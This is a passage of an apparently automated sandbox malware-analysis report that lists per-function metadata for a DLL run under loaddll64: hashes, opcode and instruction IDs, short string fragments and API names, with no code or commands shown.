                                                                                                      • Opcode Fuzzy Hash: 959f25c4968512607ae0cca543834cbc84a398ae39e464127cc603f4c4925a13
                                                                                                      • Instruction Fuzzy Hash: BEA1497091474CEBEB99CF68D8C9ADDBBB0FB44314F50521AF806A72A1CB749985CF41
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $e$Is$^F
                                                                                                      • API String ID: 0-4110932142
                                                                                                      • Opcode ID: 8b01df609d42911d7dbed2b5ba814d47211c694639234543d432211bb7cfcbab
                                                                                                      • Instruction ID: acc62b02288f5beda3e750dbd5050400b1e4c18f34ddb480ea367d498b282e57
                                                                                                      • Opcode Fuzzy Hash: 8b01df609d42911d7dbed2b5ba814d47211c694639234543d432211bb7cfcbab
                                                                                                      • Instruction Fuzzy Hash: 0051587061C7488FD7A8DF18D48679BB7E0FB89710F805A1DE8CA83255D770A845CB87
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 0ZI$4$dUn
                                                                                                      • API String ID: 0-3362017604
                                                                                                      • Opcode ID: c73b6bf479576f7c26dbb328f7938954da3fed1ffa6b789c040732a3e6a37130
                                                                                                      • Instruction ID: 064bfcd7f6638f6f98711acfe7d0f42a6c132ae3c1731c2332aecbaa5a5ea63a
                                                                                                      • Opcode Fuzzy Hash: c73b6bf479576f7c26dbb328f7938954da3fed1ffa6b789c040732a3e6a37130
                                                                                                      • Instruction Fuzzy Hash: 0B712B7050C7888FD7B9DF28C5856DEBBF5FB85744F10491DE68A8B2A0CB769A44CB02
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: O$[_K&$j
                                                                                                      • API String ID: 0-2002151384
                                                                                                      • Opcode ID: 5cf88421c4129e4e4d54df4380985a4d6ea1c7f681516431ef3b689608c2f6b2
                                                                                                      • Instruction ID: 130c59dac31ff76bf7ecf9fa28c9de255088e9ae4d54174b3cf98d95bf2c37bf
                                                                                                      • Opcode Fuzzy Hash: 5cf88421c4129e4e4d54df4380985a4d6ea1c7f681516431ef3b689608c2f6b2
                                                                                                      • Instruction Fuzzy Hash: 2B71197050074E8BDF98CF64C8866DE7FB0FB18398F114219E84AA6290D778D695CBD9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: -h$WT$>"I
                                                                                                      • API String ID: 0-2979910649
                                                                                                      • Opcode ID: 5da2aa70a551583c734fba3b02d0d500b77670d66d11a43c5cdac74a8a900ebb
                                                                                                      • Instruction ID: 6ab3343b6eba3a4e136222caae9e220da80dded31bc064814014cf5ee83a2919
                                                                                                      • Opcode Fuzzy Hash: 5da2aa70a551583c734fba3b02d0d500b77670d66d11a43c5cdac74a8a900ebb
                                                                                                      • Instruction Fuzzy Hash: 3B513770D04719DBEB98DFA8E8C66DDBBB1FB48314F10422DE406A72A0DB74994ACF41
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 34$I$s$-
                                                                                                      • API String ID: 0-2987712878
                                                                                                      • Opcode ID: d159740019d0e44eb242a52937dbef6f57aff17195a7a3dbeb5ec86a09e691a0
                                                                                                      • Instruction ID: c68e5fb14b586ef0c40ae38bb2e1e53b7502f2b933fd0fcbf89fc63657b2c948
                                                                                                      • Opcode Fuzzy Hash: d159740019d0e44eb242a52937dbef6f57aff17195a7a3dbeb5ec86a09e691a0
                                                                                                      • Instruction Fuzzy Hash: 11817FB590438E8FDF48CF64D88A5CE7BB0FB58358F004A19F86696250D3B8DA25CF85
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 3W$sR$v
                                                                                                      • API String ID: 0-1518777123
                                                                                                      • Opcode ID: f3dd92e2af734b6d8115ba1069bd08988295307ba7074c78637fd19ad14d7fff
                                                                                                      • Instruction ID: c80d461967320ed9e8a283cc826d951d9acd29724fcff4159453b991850cd8cf
                                                                                                      • Opcode Fuzzy Hash: f3dd92e2af734b6d8115ba1069bd08988295307ba7074c78637fd19ad14d7fff
                                                                                                      • Instruction Fuzzy Hash: 7341B7B190034A8FDB48CF64C48A5DE7FB1FB58398F504619FC55A6290D3B896A4CBC5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: >$Da$p
                                                                                                      • API String ID: 0-3088490888
                                                                                                      • Opcode ID: f12031464043262cdf2dafd4592515557577c67e86acbf92f010fd442108c94b
                                                                                                      • Instruction ID: 353200845392aed209a7bf182385cf358c291394da9f2443bd3897ec4edc7df4
                                                                                                      • Opcode Fuzzy Hash: f12031464043262cdf2dafd4592515557577c67e86acbf92f010fd442108c94b
                                                                                                      • Instruction Fuzzy Hash: 6D41E6B091038E8BDF48CF64C85A4DE7BB0FB48358F50461DEC66A6290D3B8DA64CB85
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Y$[?$z
                                                                                                      • API String ID: 0-81702474
                                                                                                      • Opcode ID: de9be9ef5f92379645fd7b383ffa1058af5c5180b6576b9449143d6c210c2e7c
                                                                                                      • Instruction ID: 17df8d7d90ce60fd82a33c040225e484019840e26e547c8a3bada95d9f576c07
                                                                                                      • Opcode Fuzzy Hash: de9be9ef5f92379645fd7b383ffa1058af5c5180b6576b9449143d6c210c2e7c
                                                                                                      • Instruction Fuzzy Hash: CF41E2705187859BD398DF68C48991FBBF0FBC5388F906A1DF982866A0C7B4D958CB43
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %i$J_d$o
                                                                                                      • API String ID: 0-2302849290
                                                                                                      • Opcode ID: 26ed555b5558ee36b46f6658a60b078ea9f2e99077f6798d56f26bd8e6eafb97
                                                                                                      • Instruction ID: 229211298eb705b26fc20b4edb46dcac7afe9bcf222d918521f2a27618a9e0ef
                                                                                                      • Opcode Fuzzy Hash: 26ed555b5558ee36b46f6658a60b078ea9f2e99077f6798d56f26bd8e6eafb97
                                                                                                      • Instruction Fuzzy Hash: 7A41B4B080074E8FDB48CF24D4864DE7FB1FB68398F640619F856A62A0D3B4D6A5CBC5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %.&$~!$z
                                                                                                      • API String ID: 0-3431779881
                                                                                                      • Opcode ID: 75f8db90995428d235334ca748c23d9b71a29a6c06c75c993f3f4e05e3c73a3c
                                                                                                      • Instruction ID: 9d03681536e8c1acf3d5946c054e5fc16c7955f97845821e7fbbe181f26a3c0c
                                                                                                      • Opcode Fuzzy Hash: 75f8db90995428d235334ca748c23d9b71a29a6c06c75c993f3f4e05e3c73a3c
                                                                                                      • Instruction Fuzzy Hash: E04104B050438A8BDB48CF24C88A5DE3BB0FB58358F01471DFC9AA6290C7B8D664CB84
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: .$B3$J:
                                                                                                      • API String ID: 0-3064689667
                                                                                                      • Opcode ID: fd8509d6533ef7e32cb756af4334f2030a9ae0f8979fbcbea7cb16ab3bf8e675
                                                                                                      • Instruction ID: 182ec4a01b3342a6bdc382118e07b0b009bb3174144ecf8c9284c759066334ab
                                                                                                      • Opcode Fuzzy Hash: fd8509d6533ef7e32cb756af4334f2030a9ae0f8979fbcbea7cb16ab3bf8e675
                                                                                                      • Instruction Fuzzy Hash: 1E41F3B090078E8FDB48CF24C88A0DE7BB0FB58358F114A1DEC56A6290D3B89664CF85
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Ks$ie$p7
                                                                                                      • API String ID: 0-1618259084
                                                                                                      • Opcode ID: 80a2af57191d82605d2cef362d461bc808ae7e9cf162dbf889fca5d963639e5b
                                                                                                      • Instruction ID: 863d019dd3a3bb72510893778e5e059fd04ef929c99d5fcecc9495c153576d57
                                                                                                      • Opcode Fuzzy Hash: 80a2af57191d82605d2cef362d461bc808ae7e9cf162dbf889fca5d963639e5b
                                                                                                      • Instruction Fuzzy Hash: 2F41B2B180438E8FDF45CF64D88A5CE7BB0FB18358F104A09E869A6290D3B89664CFD5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: N=?S$v$}j
                                                                                                      • API String ID: 0-4092938293
                                                                                                      • Opcode ID: 9d3866c83932be72d87d742c92594d1c0fe478a87f622f102371e8f125a421ef
                                                                                                      • Instruction ID: 8436987ba3b6f8a2bbd854dc6c076361a1b3de70f86c3d0693d23ca26d216a44
                                                                                                      • Opcode Fuzzy Hash: 9d3866c83932be72d87d742c92594d1c0fe478a87f622f102371e8f125a421ef
                                                                                                      • Instruction Fuzzy Hash: F3211A7021DB48ABD39CDF28D19562ABAF1FBC8744F909A1DF586C73A0C774C9458B42
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 2`$XS$WFY
                                                                                                      • API String ID: 0-4220438673
                                                                                                      • Opcode ID: 4214e4b7748eee943712e52e0a0b26d526995497c398dca3acb8c82fd8363403
                                                                                                      • Instruction ID: 1a3a2533c7ad1ec2e7205bdb6f80c12431c695e37eabcbb0c696e965016089c0
                                                                                                      • Opcode Fuzzy Hash: 4214e4b7748eee943712e52e0a0b26d526995497c398dca3acb8c82fd8363403
                                                                                                      • Instruction Fuzzy Hash: 68215AB46087848FD388DF28D04941BBBE1BB88358F414B2DF4CAA7260D7789A54CF4A
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionRaise_clrfp
                                                                                                      • String ID:
                                                                                                      • API String ID: 15204871-0
                                                                                                      • Opcode ID: 327b7a6c132c00c2e162c9657ffb3d47e3a234bedabc651e6bde2b282c1ec227
                                                                                                      • Instruction ID: b988256e8676f1650011f78c57b980eee8f679192e9878e6b56d215a85e77939
                                                                                                      • Opcode Fuzzy Hash: 327b7a6c132c00c2e162c9657ffb3d47e3a234bedabc651e6bde2b282c1ec227
                                                                                                      • Instruction Fuzzy Hash: BCB14B77614B898BEB15CF29C8823687BA0F785B88F258932DA5D877A4CB3DD491C710
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: BinaryCryptString
                                                                                                      • String ID:
                                                                                                      • API String ID: 80407269-0
                                                                                                      • Opcode ID: 2f5e26cf3e0217929738c2aa1eb9f506f6dc2ef2b5635523749955393274f26c
                                                                                                      • Instruction ID: 209d2d0eb9544353542e91f0895583bf0cdcd55cf4200fbcb0a5cd0d85298999
                                                                                                      • Opcode Fuzzy Hash: 2f5e26cf3e0217929738c2aa1eb9f506f6dc2ef2b5635523749955393274f26c
                                                                                                      • Instruction Fuzzy Hash: 52213B33A18B8586DB50CF1AE48472AB3A1F78A7D4F004035EA8D83B69DF7DD4858B14
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Y6}$d9(4
                                                                                                      • API String ID: 0-3330832364
                                                                                                      • Opcode ID: b043fa54239bd32b140c4ade51c25e42e7665cf50e01dff0b3be8c5be184675f
                                                                                                      • Instruction ID: aff03ef72771b13b87f2cc74d6bb077380ea2266c6580fb6b6b65536942d94d8
                                                                                                      • Opcode Fuzzy Hash: b043fa54239bd32b140c4ade51c25e42e7665cf50e01dff0b3be8c5be184675f
                                                                                                      • Instruction Fuzzy Hash: CB12087090470DEFDB98CF68C49AA9EBBF1FB48344F40816DE849AB290D7749A59CB41
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ?T~$LPX
                                                                                                      • API String ID: 0-3819494200
                                                                                                      • Opcode ID: 5371fcae6a6dea951bf7840fb42d0654fda63255fe2b3c817271c2b7c944b8ce
                                                                                                      • Instruction ID: 5bcc9d51a0cb75c4178e46190e4acf5e718f13166394170a7e92e99ce26cb4c6
                                                                                                      • Opcode Fuzzy Hash: 5371fcae6a6dea951bf7840fb42d0654fda63255fe2b3c817271c2b7c944b8ce
                                                                                                      • Instruction Fuzzy Hash: FCE109B1A0870C9FDF99DFA8D48A6DDBBF1FB58384F00411AE406B7290DB749909CB95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 5]w$K>DO
                                                                                                      • API String ID: 0-1721466923
                                                                                                      • Opcode ID: 93887384d1e3e316060a719fa74046c8221635d2d4d23715a552f7898b76f6a5
                                                                                                      • Instruction ID: 7ff9c6c976455071c2a9df6d60b89cf37126c55da19abf4d4cee6ceb2b958208
                                                                                                      • Opcode Fuzzy Hash: 93887384d1e3e316060a719fa74046c8221635d2d4d23715a552f7898b76f6a5
                                                                                                      • Instruction Fuzzy Hash: 0BB1227550234CCBEBA9DF68D1CA6DD7BE1EF24344F104019FC5A9A2A2C774D929CB48
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: lqCn$m[l
                                                                                                      • API String ID: 0-3128696216
                                                                                                      • Opcode ID: 4c7d10dd5693097ca8244591837128d2cd95e17d02ebbf0952c9b834f9068715
                                                                                                      • Instruction ID: 4deb5b9ca544bed4c7e5f99d3a15c07392b613d523b2cda5bb59967198a77625
                                                                                                      • Opcode Fuzzy Hash: 4c7d10dd5693097ca8244591837128d2cd95e17d02ebbf0952c9b834f9068715
                                                                                                      • Instruction Fuzzy Hash: CCB11571400709CFDB98CF28C58AADD3BA0FF58358F82422AFD09972A0D774DA59CB49
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Nt$U
                                                                                                      • API String ID: 0-2773090818
                                                                                                      • Opcode ID: 75f2b5d32e15d85487eb668497678b5eb0055a4daa499d447cf193525b22889b
                                                                                                      • Instruction ID: 45fe5b86ad995d4d9c8212a5c7c68854cc0b5cbfbb722d6ff257206196d8d1d1
                                                                                                      • Opcode Fuzzy Hash: 75f2b5d32e15d85487eb668497678b5eb0055a4daa499d447cf193525b22889b
                                                                                                      • Instruction Fuzzy Hash: FAA1E4B05047888FEB58DF68D8866D93FA1FB48398F11421DFC8AA72A0D778D945CBC5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: #X$Us
                                                                                                      • API String ID: 0-3203413852
                                                                                                      • Opcode ID: 927f4b49d76b73256ea5c740f2e30509fd742bc0798702765f896e21c4c8ed3c
                                                                                                      • Instruction ID: 41232c5cd5cce4775d7c49e7c64c552743a4e7719aa725caeeb3acb0d5dfb118
                                                                                                      • Opcode Fuzzy Hash: 927f4b49d76b73256ea5c740f2e30509fd742bc0798702765f896e21c4c8ed3c
                                                                                                      • Instruction Fuzzy Hash: 54B167B590070DCFEB98DF28C18A59D3BA9FF55308F404129FC1E962A1E3B8E518CB56
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %R$tt"
                                                                                                      • API String ID: 0-772664118
                                                                                                      • Opcode ID: cdb4b53f2f09b2303a41a9c0704183505d0985f12a48c0c3b60d1fd3dd25ac21
                                                                                                      • Instruction ID: 8fbc46d1b7e2f611e930d46153dfa18b699fa5ceb3b757a8db7b1acf46b52deb
                                                                                                      • Opcode Fuzzy Hash: cdb4b53f2f09b2303a41a9c0704183505d0985f12a48c0c3b60d1fd3dd25ac21
                                                                                                      • Instruction Fuzzy Hash: 09813C7051474D8BDF98CF28C8896ED3BA0FB48398F565319FD4AA6390CB78D585CB84
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 5t%$y
                                                                                                      • API String ID: 0-493594994
                                                                                                      • Opcode ID: 6f0e00c9ead975cfaf4ea2e77c512cc28932c103f1f544ab72cc7830bdf191ce
                                                                                                      • Instruction ID: 6792571393c1fc0b2eb6fbc5ae81dec58a59b384453640eb5fb68cdcf9e85be0
                                                                                                      • Opcode Fuzzy Hash: 6f0e00c9ead975cfaf4ea2e77c512cc28932c103f1f544ab72cc7830bdf191ce
                                                                                                      • Instruction Fuzzy Hash: AA918BB190078ECFDB58CF68C84A5CE7BB0FB14358F404A19F866962A0D3B4DA65CF95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 1e$f<$F
                                                                                                      • API String ID: 0-2724976541
                                                                                                      • Opcode ID: 1d95138f6fdf08470e8f176c0dd76d9716459aa4dede15dc4b9a20d9c628de90
                                                                                                      • Instruction ID: bed1062ba2242fdda31b79b65a0af6ec507006944e588aaef166d9663dde45ee
                                                                                                      • Opcode Fuzzy Hash: 1d95138f6fdf08470e8f176c0dd76d9716459aa4dede15dc4b9a20d9c628de90
                                                                                                      • Instruction Fuzzy Hash: 1971197010468CABEBBACF68C8997D937A0FB48348F50861DE90D8E290DF749B49DB01
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: L$Y"
                                                                                                      • API String ID: 0-1467774553
                                                                                                      • Opcode ID: 2c48c4371220eb54a9ab09e752dd04f6ad79d49a1bf6e2c0c73efc3286d8c696
                                                                                                      • Instruction ID: b3e18f2d7fd9a4b9b80f79599815d3f82c5d11737bc9d592f484fdbe236454d7
                                                                                                      • Opcode Fuzzy Hash: 2c48c4371220eb54a9ab09e752dd04f6ad79d49a1bf6e2c0c73efc3286d8c696
                                                                                                      • Instruction Fuzzy Hash: CB61267151074D9FDB88CF28C8C9AC97BA1FB483A8F55A218FC0A97255C7B4D885CF85
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Sa$y&
                                                                                                      • API String ID: 0-700414750
                                                                                                      • Opcode ID: 20d9025a8a3505d7d31e7295bad198ad76a83a447a1e61e4b9726380a692546c
